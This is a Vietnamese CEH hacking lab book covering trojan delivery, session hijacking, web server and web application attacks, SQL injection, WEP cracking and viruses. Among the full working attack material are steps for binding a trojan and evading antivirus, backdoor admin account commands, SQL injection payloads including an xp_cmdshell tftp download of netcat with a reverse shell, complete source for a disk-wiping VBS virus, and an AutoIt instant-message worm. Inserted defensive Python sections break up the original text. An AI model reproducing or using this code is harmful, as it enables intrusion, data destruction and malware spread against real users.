ceh lab book_tieng_viet_phan3


Upload: eragon226

Post on 19-Nov-2014


C|EH Exercise Textbook - Student Material

Lesson 7: Social Engineering

I/ Introduction

Social engineering is a trick that many hackers use to break into networks and computers. It is one of the most effective ways to steal passwords and information and to attack a system. Below is a true story about one of the most famous hackers of recent years, Kevin Mitnick (USA, who served eight years in prison for attacking computer systems) and a leading expert in social engineering. Planning an attack on company X, Kevin used this skill to dig up information about the managing director and one of his assistants. Taking advantage of a time when both were away on business, he used a spoofed caller ID, imitated the assistant's voice, called the company's network administrator and asked him to send the director's login password because the director had forgotten it. The administrator checked a few details about the "assistant", but Kevin had the information and the wit to answer. The result: Kevin obtained the password and took control of company X's entire network.

Another form of the scam: one bad day you receive a phone call, and a sweet voice at the other end says: "Hello sir, the service you are using with our company is currently having a problem with your account. Please send us your account details right away so that we can correct it." At first this sounds like a crude trick, but the success rate is very high, especially when the voice is as charming as the operators on the 1080 hotline! A similar method is the "Fake Email Login" technique. In principle, whenever we log in to a mailbox we have to enter our account details, username and password, and send them to the mail server for processing. Exploiting this, hackers design fake login pages (Fake Login) so that the details are sent to them instead.

In short, social engineering is extremely varied and also extremely dangerous because of how effective and widespread it is. It does not require much technology, and may involve no technology at all (non-technical). A hacker can carry it out by letter, e-mail, telephone, face to face, through acquaintances or personal relationships, and so on, in order to coax out information that users disclose unintentionally. In Vietnam this technique is still fairly new, so it is not rare for people to be fooled easily. For example, last year a whole series of MU Global gamers lost all of their (virtual) property when they naively entered their account details into a hacker's e-mail impersonating the MU admin! (Quoted)

II/ Labs

Lab 1: Sending an anonymous e-mail with a Trojan attached

VSIC Education Corporation, page 74

To carry out this lab we use the Mini-binder program to bind the trojan file to an image and change its icon, and the Outlook program to send the anonymous e-mail.

To bind the image file and the trojan file, we first create a trojan, then take any image file and any .ico file to bind. We use the command

    MMB 60.ico svchost.exe cathu.jpg trojanhao.exe

to bind the trojan svchost.exe with cathu.jpg using 60.ico as the icon. Next we compress the new trojan file with WinRAR several times to evade the anti-virus program (this depends on the anti-virus version; however, most trojans do not get past these programs), and change the Outlook information.

We go to Tool → Option → Mail setup → View Account, select the account to change and change the Your Name and E-mail Address fields. Then we attach the file and send the e-mail. In this lab the author sends to the address [email protected] and then checks that mailbox to see whether the mail has arrived.

Lesson 8: Session Hijacking

I/ Introduction

As we know from the sniffer (eavesdropping on the network), a hacker can take any information that is not encrypted, or can fake a CA to read information inside HTTPS; now we have one more technique, session hijacking. To carry out this lab we must first use ARP spoofing, and then use the T-sight or Hunt software to take the session away from the victim machine.

II/ Lab

In this lab the author uses VMware, with one machine used to test TELNET and SSH. Of the two remaining machines, one runs Windows 2000 (with the T-sight tool installed) and one runs Linux to test SSH. Installing the software is fairly easy; you need to add the driver and switch to the 192.168.200.0/24 range because the trial version is being used.

After installation, on machine 192.168.200.1 we allow other machines to telnet in, and from machine 192.168.200.2 we telnet to 192.168.200.1. With the data captured from machine 192.168.200.2, we use the Take Over feature in the T-sight tool to take the session.
After the session has been taken, the Telnet session on the client shows Lost connection, and in this case the user has no idea what caused the lost connection. Now we start the SSH service on the Linux machine with the service sshd command and test session hijacking against SSH traffic.

Lesson 9: Hacking Web Server

I/ Introduction

Usually, to hack a web server, a hacker first has to look at what operating system the web server is running and what services run on it. The operating system is usually Windows 2000 Server, Windows 2003 Server, Red Hat, etc., and the services include Apache, IIS, FTP Server, etc. If one of the operating system's services or another service has a flaw, it can lead to loss of control of the system. In the practical part of this section the author presents the DCOM flaw in the operating system and the application flaws in Serv-U and Apache (FTP server). From these flaws we can take complete control of the victim machine.

II/ Labs

Lab 1: Attacking a Windows 2003 web server (Apache flaw)

To find out whether the system's server has a flaw, we use a scanning tool to check (this was covered in the scanning lesson).

Rank  Vulnerability Name                                    Count
1     echo service                                          1
2     ASN.1 Vulnerability Could Allow Code Execution        1
3     Windows Cumulative Patch 835732 Remote                1
4     Null Session                                          1
5     No Remote Registry Access Available                   1
6     telnet service                                        1
7     DCOM Enabled                                          1
8     Windows RPC Cumulative Patch 828741 Remote            1
9     Windows RPC DCOM interface buffer overflow            1
10    Windows RPC DCOM multiple vulnerabilities             1
11    Apache 1.3.27 0x1A Character Logging DoS              1
12    Apache 1.3.27 HTDigest Command Execution              1
13    Apache mod_alias and mod_rewrite Buffer Overflow      1
14    ApacheBench multiple buffer overflows                 1
15    HTTP TRACE method supported                           1

We do not see any information about the FTP server here, because the Retina software can only identify Microsoft services and the common services; less common services are only shown as open ports. In this case we see port 21 open.
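Going back to the session-hijacking lab of Lesson 8: the take-over only works because the victim's ARP cache has first been poisoned, and that poisoning leaves traces a defender can check for. The following Python script is an added example, not part of the VSIC lab book; it replays two constructed `arp -a`-style snapshots (the addresses and MAC values are made up) and flags the two classic symptoms: an IP whose hardware address changes, and one hardware address answering for several IPs.

```python
"""Detect the ARP-cache symptoms of the spoofing used in Lesson 8.

Added example, not from the VSIC lab book. It replays constructed
`arp -a`-style snapshots and flags two symptoms of ARP spoofing:
  * an IP whose hardware address changes between snapshots (or
    differs from a pinned, operator-known value), and
  * one hardware address claiming several IPs in the same snapshot,
    which is what an attacker sitting between two hosts looks like.
"""
import re
from collections import defaultdict

# Constructed snapshots of a victim's ARP cache before and after poisoning.
SNAPSHOTS = [
    # t0: healthy cache
    """192.168.200.1   00-50-56-c0-00-01   dynamic
192.168.200.2   00-0c-29-aa-bb-cc   dynamic
192.168.200.7   00-0c-29-de-ad-01   dynamic""",
    # t1: the MAC of .7 now also answers for the telnet server .1
    """192.168.200.1   00-0c-29-de-ad-01   dynamic
192.168.200.2   00-0c-29-aa-bb-cc   dynamic
192.168.200.7   00-0c-29-de-ad-01   dynamic""",
]

# Optional static knowledge: addresses an operator knows must not move (constructed).
PINNED = {"192.168.200.1": "00-50-56-c0-00-01"}

# Accepts Windows (dash) and Linux (colon) MAC notation.
LINE_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})", re.I)


def parse_arp(text):
    """Return {ip: mac} from arp -a style lines; MACs normalised to lowercase dashes."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace(":", "-")
    return table


def analyse(snapshots, pinned=None):
    """Compare successive ARP snapshots and return a list of alert strings."""
    pinned = pinned or {}
    alerts = []
    previous = None
    for idx, raw in enumerate(snapshots):
        table = parse_arp(raw)
        # Symptom 1: a pinned or previously seen IP now maps to a different MAC.
        for ip, mac in table.items():
            if ip in pinned and pinned[ip] != mac:
                alerts.append(f"snapshot {idx}: {ip} expected {pinned[ip]} but cache says {mac}")
            elif previous and ip in previous and previous[ip] != mac:
                alerts.append(f"snapshot {idx}: {ip} changed from {previous[ip]} to {mac}")
        # Symptom 2: one MAC claiming more than one IP in the same snapshot.
        by_mac = defaultdict(list)
        for ip, mac in table.items():
            by_mac[mac].append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                alerts.append(f"snapshot {idx}: {mac} claims {sorted(ips)}")
        previous = table
    return alerts


if __name__ == "__main__":
    for alert in analyse(SNAPSHOTS, PINNED):
        print(alert)
```

On a real host the snapshots would come from periodic `arp -a` output; pinning the gateway and any server that carries clear-text protocols such as Telnet is what makes the first check fire immediately rather than only on the second observation.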
We use Metasploit to exploit the Apache flaw and obtain a console.

Now we will find a way to Remote Desktop into machine 192.168.200.1. First we create a user and add it to the Administrators group with the following commands:

    net user vsichao vsichao /add                 // add the user
    net localgroup Administrators vsichao /add    // put the user in the Administrators group

We can check again with the net user command whether our user has administrator rights. Next we try Remote Desktop into the machine with the command mstsc /v 192.168.200.6. If that does not work we use the file Openrdp.vbs to open Remote Desktop. We use the Cisco TFTP Server program to push this file to the victim server, running the tftp command on the victim machine to fetch the file.

Add the user and raise it to Administrator. Remote Desktop with the user cehclass succeeds, so we have complete control of the victim machine.

Lab 2: Exploiting the Serv-U application flaw

As in the lab above, we use the nmap program to determine the Serv-U version and use Metasploit to attack.

Lesson 10: WEB APPLICATION HACKING

I/ Introduction

A web application normally uses the input data in HTTP requests (or in files) to determine its response. An attacker can modify any part of an HTTP request, including the URL, query string, headers, cookies, form fields and even hidden fields, in order to get past the security mechanisms. Common attacks of this kind include:

- Running arbitrary system commands
- Cross site scripting
- Buffer overflows
- Format string attacks
- SQL injection
- Cookie poisoning
- Modifying hidden fields

In this practical we try to exploit Cross Site Scripting, Format string, Cookie Manipulation and Authorization Failure vulnerabilities.

II/ Labs

Lab 1: Cross Site Scripting

First we log in with the username jv and password jv789 and choose the post message function. Then we post a script in the message text.
Then we submit this script post. We press F5 to refresh the browser and see it appear. At this point the victim's browser unwittingly executes the script that the user posted to the server. Using this script the attacker can steal the victim's cookie and log in to the system.

Lab 2: Insufficient Data Validation

In this lab, when transferring money from one account to another, the amount parameter must always be greater than 0. However, in some cases a hacker can change this number to a negative value using an HTTP proxy program. This can damage the finances of the HackmeBank bank. We try a transfer with Amount 100 from any account to another account; it succeeds. We transfer once more, but with the value -100; because there is a check on the client side, the transfer does not succeed.

Now we use the WebScarab program as an HTTP proxy and change the parameter that is POSTed to the server. The response from the server shows that the transfer still succeeds. Checking under Transaction we see the transfer recorded.

Lab 3: Cookie Manipulation

While logging in, we see in the cookie a parameter CookieloginAttempts, which is used to lock the session when someone tries to log in with a wrong or unknown password. This parameter counts down from 5 to 0; when it reaches 0 the session is locked. We can use WebScarab to change this parameter and prevent the server from locking the session.

Lab 4: Authorization Failure

First we look at the accounts of the user jc, password jc789. We see the account numbers 5204320422040005, 5204320422040006, 5204320422040007 and 5204320422040008; user jc only manages the accounts with these numbers. However, we pay attention to the URL when using the View Transaction feature. We replace the parameter 5204320422040005 with 5204320422040004 (a number that does not belong to an account managed by user jc).
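Each of the four HackmeBank labs above succeeds because a check was done only in the browser, only in a cookie, or not at all. The Python below is an added example, not part of the lab book or of HackmeBank: it models the server side of those four functions with the checks in the right place. The users, passwords and account numbers are taken from the lab text; which user owns 5204320422040004, the balances and the `Rejected` exception are constructed for the example.

```python
"""Server-side checks for the four HackmeBank weaknesses in Lesson 10.

Added example, not part of the original lab book. Users jv/jv789 and
jc/jc789 and the 52043204220400xx account numbers come from the lab text;
ownership of 5204320422040004, the balances and the exception type are
constructed here so the code runs stand-alone.
"""
import html

# Constructed data: which user owns which accounts, and starting balances.
OWNERS = {
    "jc": {"5204320422040005", "5204320422040006",
           "5204320422040007", "5204320422040008"},
    "jv": {"5204320422040004"},
}
BALANCES = {acct: 1000 for accts in OWNERS.values() for acct in accts}
PASSWORDS = {"jv": "jv789", "jc": "jc789"}
MAX_ATTEMPTS = 5
_attempts = {}  # server-side counter keyed by user; replaces the client cookie


class Rejected(Exception):
    """Raised when a request fails a server-side check."""


def transfer(user, src, dst, amount):
    """Lab 2: the amount check must run on the server, not only in the browser."""
    if not isinstance(amount, int) or amount <= 0:
        raise Rejected("amount must be a positive integer")
    if src not in OWNERS.get(user, set()):
        raise Rejected("source account not owned by caller")
    if dst not in BALANCES or BALANCES[src] < amount:
        raise Rejected("unknown destination or insufficient funds")
    BALANCES[src] -= amount
    BALANCES[dst] += amount
    return BALANCES[src]


def view_transactions(user, account):
    """Lab 4: the account named in the URL must belong to the logged-in user."""
    if account not in OWNERS.get(user, set()):
        raise Rejected("account not owned by caller")
    return f"transactions for {account}"


def login(user, password):
    """Lab 3: keep the lockout counter server side, so a proxy cannot reset it."""
    if _attempts.get(user, 0) >= MAX_ATTEMPTS:
        raise Rejected("account locked")
    if PASSWORDS.get(user) != password:
        _attempts[user] = _attempts.get(user, 0) + 1
        raise Rejected("bad credentials")
    _attempts[user] = 0
    return True


def render_message(text):
    """Lab 1: escape user content so a posted <script> is shown as text, not run."""
    return f"<p>{html.escape(text, quote=True)}</p>"


def rejected(fn, *args):
    """True if the call is refused by a server-side check (used in the demo below)."""
    try:
        fn(*args)
    except Rejected:
        return True
    return False


if __name__ == "__main__":
    print(transfer("jc", "5204320422040005", "5204320422040004", 100))   # 900
    print(rejected(transfer, "jc", "5204320422040005", "5204320422040004", -100))  # True
    print(rejected(view_transactions, "jc", "5204320422040004"))         # True
    print(render_message("<script>alert(1)</script>"))
```

The negative amount, the foreign account number and the cookie edit all reach the server exactly as WebScarab would send them; the difference is that the decision is now taken from data the client cannot touch (the session's user, the server's own counter), and output encoding removes the browser's reason to treat the posted message as code.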
Thus the web site has an authorization (access-control) flaw.

Lesson 11: SQL INJECTION

I/ Introduction to SQL Injection

This attack technique takes advantage of flaws in the application (not carefully checking the characters entered by the user). It is carried out by adding code to SQL statements or queries (through text boxes) before they are passed to the web application for processing; the server executes them and returns the result (query results or error messages) to the browser, from which attackers can collect data, run commands (in some cases) and then take control of the system. Here are a few basic tricks.

1) Getting the current table and column names:

Structure:
Login page (or any injection page)::::
username: ' having 1=1--

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column VICTIM.ID is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

--> We have obtained the table VICTIM. Continue:

username: ' group by VICTIM.ID having 1=1--

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column VICTIM.Vuser is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

So we have the column Vuser.

UNION: simple but effective

Yes, we can use it to get almost everything. First let me describe its structure briefly:

Login page::::
username: ' Union select [column] from [table] where [column2=...]--
password: everything

Example: suppose we know that the two columns username and password in table VTABLE of the database victim are VUSER and VPASS; then we do as follows:
username: ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password: everything

(1): here admin is a user that you know; if you do not know one it can be left blank, and it will give you the first user.

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

If the result is as above, it means you have to union more columns until all columns of table VTABLE are covered. Its structure is as follows:

username: ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password: everything

Keep adding ",1" until the result looks something like:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.

So the password of user admin is tuibihackroi.

2) Getting every value of a known column in a known table

The secret here is Not in. Its structure is as follows (using the column from the previous example); with Vuser being admin we can get the other users:

Login Page::::::
username: ' Union select Vuser,1,1,1,1 from Vtable where username not in ('admin')--

Then we obtain one more user, and we simply insert it into the Not in (e.g. Not in ('admin','hacker',...)); continuing like this we get every user (and of course every password afterwards).

**** To get the list of user names matching a rule of your choice, for example only users containing the word admin, we use like; the structure:

Login Page::::::
username: ' Union select Vuser,1,1,1,1 from Vtable where username not in ('admin') like '%admin%'--

3) Getting all tables and columns of the database:

The secret is this database table: INFORMATION_SCHEMA.TABLES with the column TABLE_NAME (holding all tables), and the table INFORMATION_SCHEMA.COLUMNS with the column COLUMN_NAME (holding all columns).

Usage with Union:

Login page:::::::
username: ' UNION SELECT TABLE_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.TABLES WHERE ...

So we can get all the tables; once we have a table we get all of its columns:

Login page:::::::
username: ' UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=... and ...

That is the most basic material on SQL injection I can give you; doing it well also takes a bit of creativity. I hope it helps you a little when you come across a site vulnerable to SQL injection.

4) Without UNION:

If you find Union inconvenient, you can use "Convert" more easily to collect information through the error messages.

Structure:
login page::::
user: '+ convert(int,(select @@version))--

The above is an example of getting the version; now, to get any other information you just replace "select @@version", but remember that if it is the first time you get the information you should add TOP 1. E.g.:

user: '+ convert(int,(select Vpass from Vtable where Vuser='admin'))--

Note: if it does not work, it may be because the + sign is not accepted; in that case replace it with %2b. E.g.:

user: '%2b convert(int,(select Vpass from Vtable where Vuser='admin'))--

5) Running SQL commands: to run a command you can use ";"

Structure:
login page:::::
user: '; [command]--

e.g. '; DROP TABLE VTABLE--

II/ Lab

In this lab the hacker (machine 192.168.1.44) attacks Server 2000 (192.168.1.46) through the web port, uploads a web-based trojan onto Server 2000 and then controls this server. First we use the Acunetix software to scan whether the web server has any application flaw.

We can test by hand in this situation by adding a ' character in the login form.
Here are a few pieces of code for getting information about the server once we know it has a SQL flaw.

1/ Get the server name:
    ' and 1=convert(int,@@servername)--sp_password
2/ Get the database name:
    ' and 1=convert(int,db_name())--sp_password
3/ Check the system user:
    ' and 1=convert(int,system_user)--sp_password
4/ Get the version:
    ' and 1=convert(int,@@version)--sp_password
5/ Get table information (table userinfo):
    ' having 1=1--                                (view the current table)
    ' group by userinfo.username having 1=1--     (view the next column)

After getting information about the server, the hacker tries to upload the netcat trojan to the server by calling the shell function in SQL together with tftp. We type the following command in the login form (remember that the client machine has to be running a TFTP server):

    ';exec master..xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";--

This command is executed on the server system through SQL; it loads nc123.exe from the TFTP server 192.168.1.44. We check on the TFTP server whether the file has been sent.

After the netcat trojan has been uploaded successfully, the job now is to run it and telnet back out to the outside. Because we are behind a firewall at this point, we cannot listen on a port, and the client outside the firewall cannot connect in. So we run the listener on the client side and telnet back out from the server. The netcat connection is established after telnetting back out from the server, and at this point we have bypassed the firewall.

Once we have the Windows console, we continue by uploading one more trojan, in web form, through TFTP. The web trojan we use is zehir4.asp, a trojan with quite a lot of convenient features. From this trojan we can easily delete the database and download files from Server 2000 to our own machine through the web port.

Getting the database. Changing the background of the web page (deface).
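Every technique in Lesson 11, from the having/group by tricks to the xp_cmdshell upload, depends on two application defects: user input spliced into the SQL text, and the raw driver error echoed back to the browser. The Python below is an added example, not from the lab book; it uses an in-memory SQLite table named userinfo (constructed, with a made-up admin password) because the lab's MS SQL server is not available here, so the exact error text differs, but the mechanism and the fix are the same.

```python
"""Vulnerable and hardened login queries for Lesson 11, plus the error leak.

Added example, not from the lab book. SQLite stands in for the lab's
MS SQL server; the userinfo table and its rows are constructed.
"""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE userinfo (username TEXT, password TEXT)")
DB.executemany("INSERT INTO userinfo VALUES (?, ?)",
               [("admin", "constructed-admin-pass"), ("jv", "jv789")])


def login_vulnerable(username, password):
    """Splices input into the SQL text and echoes the driver error, like the lab target."""
    sql = ("SELECT username FROM userinfo WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "error: " + str(exc)      # verbose error: raw material for error-based injection
    return row[0] if row else None


def login_hardened(username, password):
    """Bound parameters: the input is always data, never SQL, and errors are generic."""
    try:
        row = DB.execute(
            "SELECT username FROM userinfo WHERE username = ? AND password = ?",
            (username, password)).fetchone()
    except sqlite3.Error:
        return "error: login failed"     # details belong in the server log, not the response
    return row[0] if row else None


if __name__ == "__main__":
    # The lab's manual test: a lone quote makes the vulnerable query fail loudly.
    print(login_vulnerable("'", "x"))
    # A comment sequence after the user name removes the password check entirely.
    print(login_vulnerable("admin'--", "anything"))    # admin
    print(login_hardened("admin'--", "anything"))      # None: no such user name
```

With bound parameters the string admin'-- is compared, quote and dashes included, against the username column and matches nothing; the same input reaches the vulnerable version as part of the statement and turns the password check into a comment. Suppressing the driver message in the response removes the channel that steps 1 to 5 above read table, column and version names from.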
In short, SQL injection not only gives the hacker plenty of information about tables and columns, but can also let the hacker run system commands (in some cases) and upload trojans onto the server system.

Lesson 12: WIRELESS HACKING

I/ Introduction

Some weaknesses of wireless networks

The IEEE 802.11 standard introduced WEP (Wired Equivalent Privacy) to protect wireless transmissions. WEP uses a symmetric key to encrypt the users on the wireless network. 802.11 specifies 64-bit WEP keys, but 128-bit WEP keys are also provided. 802.11 does not specify how the keys are arranged. A WEP key consists of two parts: a 24-bit initialization vector (IV) and a secret key. The IV is transmitted in plain text in the header of 802.11 packets. However, it is very easy to crack, so the next solution was to use dynamic WEP keys that can be changed regularly.

The 802.11 standard authenticates clients using the WEP key. An industry standard was then introduced through 802.1x authentication to make up for the shortcomings of the earlier 802.11 standard. Recently, however, the University of Maryland documented a potential security problem with this 802.1x protocol. Today's solution is to use mutual authentication to stop man-in-the-middle attackers, dynamic WEP keys that are carefully arranged, and encrypted channels. Both techniques are supported by the TLS (Transport Layer Security) protocol. Most notable are per-packet keying and message integrity checking. This is the 802.11i security standard.

II/ Lab

To practise the WEP key cracking lab, we must have a network card that supports capturing packets and sending de-authentication packets back to the access point, and the Linux or Windows version must support connecting to the wifi card's driver. Within the scope of this WEP key cracking lab, because the wifi card used does not support sending de-authentication or ARP packets to the access point, the author tries to generate traffic so that packets can be captured and the WEP key then computed (the computation depends on the packets received from the access point). First we download the cracking program from http://www.aircrack-ng.org/; in this software we use airodump to capture packets and aircrack to break the WEP key.
Next we download the driver for the network card (not the manufacturer's own driver but a separately written one); here the author uses a NetGear WG511T wifi card: www.wildpackets.com/support/hardware/atheros30_driver. For Cisco Aironet we also download the driver from this site. Then we install it for the wifi card.

Next we use airodump to capture packets from the access point. We choose the card type Atheros, channel 6 and the output file hack.ivs.

We simulate traffic by copying a large piece of data through the access point; with a supported card we could do this actively ourselves. Now we see the number of packets received from the wifi card rising very fast. We wait about 20 minutes (for a 64-bit WEP key) until there are about 200,000 to 300,000 packets and use airodump to get the WEP key.

We can see that the WEP key found is Athen. The same applies to a 128-bit WEP key, but the wait is longer. WEP key 128 bit.
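The introduction above names the 24-bit IV as the weak point, and the lab shows that a few hundred thousand captured frames are enough. The Python below is an added example, not from the lab book: it puts numbers on the IV size with the birthday bound (how many frames until two of them reuse an IV, and so an RC4 keystream), the share of the IV space that a 300,000-frame capture represents, and how long a sequential IV counter lasts at an assumed frame rate. The capture-and-crack lab also relies on particular IVs leaking key bytes; the arithmetic here covers only the reuse point.

```python
"""Why a 24-bit WEP IV is too small: birthday-bound arithmetic for Lesson 12.

Added example, not from the lab book. Frame rates are assumptions for
illustration; the IV size (24 bits) is from the text.
"""
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IVs


def no_repeat_probability(frames, space=IV_SPACE):
    """Probability that `frames` randomly chosen IVs are all distinct (birthday problem)."""
    if frames > space:
        return 0.0
    log_q = 0.0
    for i in range(frames):
        log_q += math.log1p(-i / space)   # log of (1 - i/space), accurate for small i/space
    return math.exp(log_q)


def collision_probability(frames, space=IV_SPACE):
    """Probability that at least two of `frames` frames share an IV."""
    return 1.0 - no_repeat_probability(frames, space)


def frames_for_probability(p, space=IV_SPACE):
    """Smallest frame count at which the chance of an IV repeat reaches p."""
    q = 1.0          # P(no repeat among the first n frames)
    n = 0
    while 1.0 - q < p:
        q *= 1.0 - n / space   # frame n must avoid the n IVs already used
        n += 1
    return n


def share_of_iv_space(frames, space=IV_SPACE):
    """Fraction of all IVs consumed by `frames` frames when IVs are never reused."""
    return frames / space


def hours_to_exhaust(frames_per_second, space=IV_SPACE):
    """Hours until a sequential IV counter wraps at the given (assumed) frame rate."""
    return space / frames_per_second / 3600.0


if __name__ == "__main__":
    print("frames for a 50% chance of an IV repeat:", frames_for_probability(0.5))
    print("repeat probability after 200,000 frames:", collision_probability(200_000))
    print("share of IV space in a 300,000-frame capture: %.2f%%"
          % (100 * share_of_iv_space(300_000)))
    print("hours until a sequential IV wraps at 500 frames/s: %.1f" % hours_to_exhaust(500))
```

Even with random IVs, a repeat becomes more likely than not after roughly five thousand frames, and the lab's 200,000 to 300,000 frames use under two per cent of the IV space while making a repeat a certainty; a card that counts IVs sequentially from zero reuses the whole sequence every time it restarts.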
Lesson 13: VIRUS

I/ Introduction: (see the supplementary reading)

II/ Labs

Lab 1: A virus that destroys the machine's data

We can easily write a virus that destroys the machine using the Format or delete functions of the VBS language, as follows:

****
msgbox "Error !"
On Error Resume Next
' copy itself into the Windows folder (GetSpecialFolder(0))
Set vip_xinh = CreateObject("Scripting.FileSystemObject")
vip_xinh.CopyFile WScript.ScriptFullName, vip_xinh.GetSpecialFolder(0) & "\vip_xinh.vbs"
' run on every boot through the Run key
Set vip_xinh2 = CreateObject("WScript.Shell")
vip_xinh2.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\die", "wscript.exe " & vip_xinh.GetSpecialFolder(0) & "\vip_xinh.vbs %"
On Error Resume Next
' delete the contents of drive D:
Const vic = "D:\"
Delvic
Sub Delvic()
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile vic & "*.*", True
    fso.DeleteFolder vic & "*", True
End Sub
On Error Resume Next
' delete the Windows folder
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
    Dim fso1
    Set fso1 = CreateObject("Scripting.FileSystemObject")
    fso1.DeleteFile vic1 & "*.*", True
    fso1.DeleteFolder vic1 & "*", True
End Sub
On Error Resume Next
' delete the rest of drive C:
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
    Dim fso2
    Set fso2 = CreateObject("Scripting.FileSystemObject")
    fso2.DeleteFile vic2 & "*.*", True
    fso2.DeleteFolder vic2 & "*", True
End Sub
On Error Resume Next
' endless loop starting notepad until the machine hangs
Set treomay = CreateObject("WScript.Shell")
Do
    treomay.Run "notepad", False
Loop
****

Here we run the loop many times and delete the information on drives C and D; just save this script as a .vbs file and then run it. At that point a great many notepad.exe programs are opened and the machine fails.
We restart the machine using reset, but because the information on drive C has been deleted the computer will not boot again, so the infected computer is completely destroyed.

Lab 2: The "gaixinh" virus that spreads through instant messages

We analyse the code, written in AutoIt, as follows:

****
; ----------------------------------------------------------------------------
;--------------------------------------------
; Author: Kevin Duong - KVD
; Software: DKC Bot
; Version: 1.1
; Purpose: Advertise a website through Y!M
; Released: 1-9-2006
;--------------------------------------------
; Settings
#NoTrayIcon
$website = "http://daokhuc.be"
; Infect the system
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
    InetGet($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
    Sleep(5000)
EndIf
; Write registry keys
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "StartPage", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community:: Chut gi de nho...")
; Random message list
Dim $tin[10]
$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "
$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " "
$tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " "
$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " "
$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " "
$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " "
$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " "
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "
$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "
$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " "
; Change the status and send the messages
While (1)
    Sleep(60000)
    $tieude = WinGetTitle("Yahoo! Messenger", "")
    $kiemtra = WinExists($tieude)
    If $kiemtra = 1 Then
        $ngaunhien = Random(0, 9, 1)
        ClipPut($tin[$ngaunhien])
        BlockInput(1)
        WinActivate($tieude)
        Send("!m")
        Send("un")
        Send("^v {ENTER}{ENTER}")
        Send("^m")
        Send("{DOWN}")
        Send("^{SHIFTDOWN}{END}{SHIFTUP}")
        Send("{ENTER}")
        Send("^v {ENTER}")
        BlockInput(0)
    EndIf
    Sleep(1800000)
WEnd
; ----------------------------------------------------------------------------
****

Based on this code we can edit it to our liking, then use the AutoIt tool to convert the script into an .exe file and run it. After running the exe and logging in to Yahoo to check, we see a great many messages being sent; if we set the sleep parameter smaller (around 3000), messages go out very fast and in great numbers.

To spread through instant messages, we have to attach the virus to a website, or find some other way to make the victim's machine run the exe file we have just created.

Lesson 14: BUFFER OVERFLOW

I/ Theory

In computer security and programming, a buffer overflow is a programming error that can cause a memory access exception and terminate the program, or, when the user has malicious intent, be exploited to breach the security of the system.

A buffer overflow is an anomalous condition in which a process stores data beyond the boundary of a fixed-length buffer. As a result, the data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow control data.

